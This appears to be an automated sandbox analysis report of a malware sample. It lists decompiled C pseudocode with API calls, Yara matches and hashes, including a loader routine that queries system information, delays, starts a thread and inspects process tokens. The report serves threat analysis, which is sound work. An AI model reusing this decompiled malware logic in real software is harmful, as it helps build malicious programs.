                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4004f8032087574e01c170c19ffc530a553b324a06675c982da5e7d264530c80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF03071B01717DBDF20EBB99E49A5236ECAB15771B040216B819DB1D0DF20D8428660
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A614E3(void* __ecx, WCHAR** _a4) {
                                                                                                                                                                                                                                				struct HINSTANCE__* _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				long _t10;
                                                                                                                                                                                                                                				long _t19;
                                                                                                                                                                                                                                				long _t20;
                                                                                                                                                                                                                                				WCHAR* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v8 =  *0xa641b0;
                                                                                                                                                                                                                                				_t19 = 0x104;
                                                                                                                                                                                                                                				_t23 = E00A62020(0x208);
                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					_t20 = 8;
                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                					return _t20;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                                					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
                                                                                                                                                                                                                                					_v12 = _t10;
                                                                                                                                                                                                                                					if(_t10 == 0 || _t19 != _t10) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t19 = _t19 + 0x104;
                                                                                                                                                                                                                                					E00A61F0A(_t23);
                                                                                                                                                                                                                                					_t23 = E00A62020(_t19 + _t19);
                                                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t20 = 0;
                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					_t20 = GetLastError();
                                                                                                                                                                                                                                					E00A61F0A(_t23);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					 *_a4 = _t23;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L9;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61541
                                                                                                                                                                                                                                0x00a61551
                                                                                                                                                                                                                                0x00a61553
                                                                                                                                                                                                                                0x00a61543
                                                                                                                                                                                                                                0x00a61546
                                                                                                                                                                                                                                0x00a61546
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A62020: HeapAlloc.KERNEL32(00000000,?,00A61593,00000030,747863F0,00000000), ref: 00A6202C
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,00A6160E,?), ref: 00A6150C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00A6160E,?), ref: 00A6154A
                                                                                                                                                                                                                                  • Part of subcall function 00A61F0A: HeapFree.KERNEL32(00000000,?,00A61558,00000000,?,?,?,00A6160E,?), ref: 00A61F16
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1691993961-1084903527
                                                                                                                                                                                                                                • Opcode ID: fb5d495fa9832f93ef14d83545dfc8c1d28c8e26bed0eab0e061dd187c0a8671
                                                                                                                                                                                                                                • Instruction ID: a88e01348374168d67a0d0b06c0278f651a34070aeadc4d60f7be9b2c0bf25dd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb5d495fa9832f93ef14d83545dfc8c1d28c8e26bed0eab0e061dd187c0a8671
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9701D472A01612ABCB2197ADDC5499FFFB8AFD5751B190122FA03D7210EA70CD4187A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A91EBA(CHAR* _a4) {
                                                                                                                                                                                                                                				long _t9;
                                                                                                                                                                                                                                				CHAR* _t10;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                					_t10 = E00A95157(_t9);
                                                                                                                                                                                                                                					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
                                                                                                                                                                                                                                						E00A953BB(_t10);
                                                                                                                                                                                                                                						_t10 = 0;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t10;
                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A97528,73797325), ref: 00A91ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A91EE5
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                                                                                                                • String ID: PGxt
                                                                                                                                                                                                                                • API String ID: 1564683301-789712160
                                                                                                                                                                                                                                • Opcode ID: 392f053e7cb5a530679552ac76c9348606d01bf0aab36dee81897be89004fe08
                                                                                                                                                                                                                                • Instruction ID: b089f4da71b689ac004efb904ff3fa2825ce3c827dca859aaab960479df4042c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 392f053e7cb5a530679552ac76c9348606d01bf0aab36dee81897be89004fe08
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E04F32702933678A3367AA9C59DABDEDCEF92AF07050125BD08D3221DE10CC12C2E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E00A918B3(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				char* _t30;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				int _t42;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t17 = __eax;
                                                                                                                                                                                                                                				_t37 = 0;
                                                                                                                                                                                                                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                				_t28 = _t2;
                                                                                                                                                                                                                                				_t34 = E00A95157(_t2);
                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                					_t30 = E00A95157(_t28);
                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                						E00A953BB(_t34);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t39 = _a4;
                                                                                                                                                                                                                                						_t22 = E00A9A962(_t39);
                                                                                                                                                                                                                                						_v8 = _t22;
                                                                                                                                                                                                                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                							_a4 = _t39;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t26 = _t22 + 2;
                                                                                                                                                                                                                                							_a4 = _t22 + 2;
                                                                                                                                                                                                                                							_t22 = E00A9A962(_t26);
                                                                                                                                                                                                                                							_v8 = _t22;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t22 == 0) {
                                                                                                                                                                                                                                							__imp__(_t34, _a4);
                                                                                                                                                                                                                                							 *_t30 = 0x2f;
                                                                                                                                                                                                                                							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                							__imp__(_t30, _v8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_a8 = _t34;
                                                                                                                                                                                                                                						_t37 = 1;
                                                                                                                                                                                                                                						 *_a12 = _t30;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618,?,?,00A921A4,?,04FD9618), ref: 00A918BF
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                  • Part of subcall function 00A9A962: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A918ED,00000000,00000001,00000001,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618), ref: 00A9A970
                                                                                                                                                                                                                                  • Part of subcall function 00A9A962: StrChrA.SHLWAPI(?,0000003F,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618,?,?,00A921A4,?,04FD9618,0000EA60,?), ref: 00A9A97A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A92E4A,00000000,00000000,747C81D0,04FD9618,?,?,00A921A4), ref: 00A9191D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,747C81D0), ref: 00A9192D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A91939
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3767559652-0
                                                                                                                                                                                                                                • Opcode ID: 38a6443754db47e33af073d21b7f465f6ace8716a64e8891a9dcb70ca6429773
                                                                                                                                                                                                                                • Instruction ID: 32077ec6fcb860874e158ebbe32b9e8c223c4faf6f5705d0abc36ffe60a879dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38a6443754db47e33af073d21b7f465f6ace8716a64e8891a9dcb70ca6429773
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0621B476704256EBCF12AFB4CC65AAA7FF9AF06794F154055F9459F202DB30CA0187A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A91FCE(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                				_t18 = E00A95157(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                				_v8 = _t18;
                                                                                                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                                                                                                					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,04FD9364,?,00A929B1,004F0053,04FD9364,?,?,?,?,?,?,00A9A080), ref: 00A91FDE
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00A929B1,?,00A929B1,004F0053,04FD9364,?,?,?,?,?,?,00A9A080), ref: 00A91FE5
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,00A929B1,004F0053,04FD9364,?,?,?,?,?,?,00A9A080), ref: 00A92005
                                                                                                                                                                                                                                • memcpy.NTDLL(747869A0,00A929B1,00000002,00000000,004F0053,747869A0,?,?,00A929B1,004F0053,04FD9364), ref: 00A92018
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2411391700-0
                                                                                                                                                                                                                                • Opcode ID: 80668520ab08165ef6d82e990beef7f0178f21b83514eea62849ede48f0b01ed
                                                                                                                                                                                                                                • Instruction ID: 32ad04e3164cd71d98b92af40da717cee9794559f2d9d6cd81e2bc1ea8a413cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80668520ab08165ef6d82e990beef7f0178f21b83514eea62849ede48f0b01ed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26F03C36A00119FB8F11EBA8CC45CCE7BACEF483547114062B90497201E631EA118BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(04FD9B98,00000000,00000000,770CC740,00A9A73F,00000000), ref: 00A92639
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A92641
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,04FD9B98), ref: 00A92655
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A92660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 74227042-0
                                                                                                                                                                                                                                • Opcode ID: 7faa85ddaae26dadc48082a162203bcafc036f1b11563b6bad2d7ce763805ca5
                                                                                                                                                                                                                                • Instruction ID: ff01f1fd25442f498a9a3422ada397461a7e013e160de4c43ab6abc5b9431f32
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7faa85ddaae26dadc48082a162203bcafc036f1b11563b6bad2d7ce763805ca5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E01277B01A21A7CB11EBE4AC48C5BBBADEF896617040417F600D7111CB2599128BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E02B8156C(char _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				long _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                				long _t50;
                                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                                                				signed int _t62;
                                                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t25 = E02B81D65();
                                                                                                                                                                                                                                				_v8 = _t25;
                                                                                                                                                                                                                                				if(_t25 != 0) {
                                                                                                                                                                                                                                					return _t25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					_t62 = 0;
                                                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                                                					_t50 = 0x30;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t57 = E02B82020(_t50);
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_v8 = 8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                                                                                                                                                                                                                							_t53 = _t44;
                                                                                                                                                                                                                                							_t45 = _t44 & 0x0000ffff;
                                                                                                                                                                                                                                							_v8 = _t45;
                                                                                                                                                                                                                                							if(_t45 == 4) {
                                                                                                                                                                                                                                								_t50 = _t50 + 0x30;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t63 = 0x13;
                                                                                                                                                                                                                                							_t10 = _t53 + 1; // 0x1
                                                                                                                                                                                                                                							_t62 =  *_t57 % _t63 + _t10;
                                                                                                                                                                                                                                							E02B81F0A(_t57);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} while (_v8 != 0);
                                                                                                                                                                                                                                					_t27 = E02B817CE(_t57, _t62); // executed
                                                                                                                                                                                                                                					_v8 = _t27;
                                                                                                                                                                                                                                					Sleep(_t62 << 4); // executed
                                                                                                                                                                                                                                					_t28 = _v8;
                                                                                                                                                                                                                                				} while (_t28 == 9);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					L25:
                                                                                                                                                                                                                                					return _t28;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_t67 = E02B81000(E02B81064,  &_v36);
                                                                                                                                                                                                                                					if(_t67 == 0) {
                                                                                                                                                                                                                                						_v8 = GetLastError();
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                                                                                                                                                                                                                						_v8 = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							GetExitCodeThread(_t67,  &_v8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						CloseHandle(_t67);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t28 = _v8;
                                                                                                                                                                                                                                					if(_t28 == 0xffffffff) {
                                                                                                                                                                                                                                						_t28 = GetLastError();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(E02B814E3(_t53,  &_a4) != 0) {
                                                                                                                                                                                                                                					 *0x2b841b8 = 0;
                                                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t52 = _a4;
                                                                                                                                                                                                                                				_t68 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                				_t60 =  *_t68(_t52, 0, 0);
                                                                                                                                                                                                                                				if(_t60 == 0) {
                                                                                                                                                                                                                                					L16:
                                                                                                                                                                                                                                					 *0x2b841b8 = _t52;
                                                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t19 = _t60 + 2; // 0x2
                                                                                                                                                                                                                                				_t40 = E02B82020(_t60 + _t19);
                                                                                                                                                                                                                                				 *0x2b841b8 = _t40;
                                                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_t68(_t52, _t40, _t60);
                                                                                                                                                                                                                                				E02B81F0A(_t52);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02B81577), ref: 02B81D74
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: GetVersion.KERNEL32 ref: 02B81D83
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: GetCurrentProcessId.KERNEL32 ref: 02B81D9F
                                                                                                                                                                                                                                  • Part of subcall function 02B81D65: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02B81DB8
                                                                                                                                                                                                                                  • Part of subcall function 02B82020: HeapAlloc.KERNEL32(00000000,?,02B81593,00000030,747863F0,00000000), ref: 02B8202C
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL ref: 02B815A1
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,00000000,00000030,747863F0,00000000), ref: 02B815E8
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02B8161E
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02B8163C
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,02B81064,?,00000000), ref: 02B81673
                                                                                                                                                                                                                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 02B81685
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02B8168C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(02B81064,?,00000000), ref: 02B81694
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02B816A1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3479304935-1084903527
                                                                                                                                                                                                                                • Opcode ID: 06d14b389db4a13932dd9e82f55f16842329ab95381f62b9fe5e5fdf4b335c31
                                                                                                                                                                                                                                • Instruction ID: 4411cf347821fb0b02af356d8ff5bbc5a44cc2e4a37a11c1e2a7bcca764594c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06d14b389db4a13932dd9e82f55f16842329ab95381f62b9fe5e5fdf4b335c31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC317371D12216ABD721BFA8DC44AEE7AFDEF44694F1445A6E50DE7140DB30CA42CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                                                                                			E02BB6307(char _a4, void* _a8) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                				char _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				void** _t33;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				void** _t44;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v20 = _a4;
                                                                                                                                                                                                                                				_t48 = 0;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_a4 = 0;
                                                                                                                                                                                                                                				_v44 = 0x18;
                                                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                					_t33 =  &_v8;
                                                                                                                                                                                                                                					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                					if(_t33 >= 0) {
                                                                                                                                                                                                                                						_t47 = __imp__;
                                                                                                                                                                                                                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                						_t44 = E02BB5157(_a4);
                                                                                                                                                                                                                                						if(_t44 != 0) {
                                                                                                                                                                                                                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                							if(_t40 >= 0) {
                                                                                                                                                                                                                                								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                								_t48 = 1;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							E02BB53BB(_t44);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						NtClose(_v8); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					NtClose(_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t48;
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                APIs
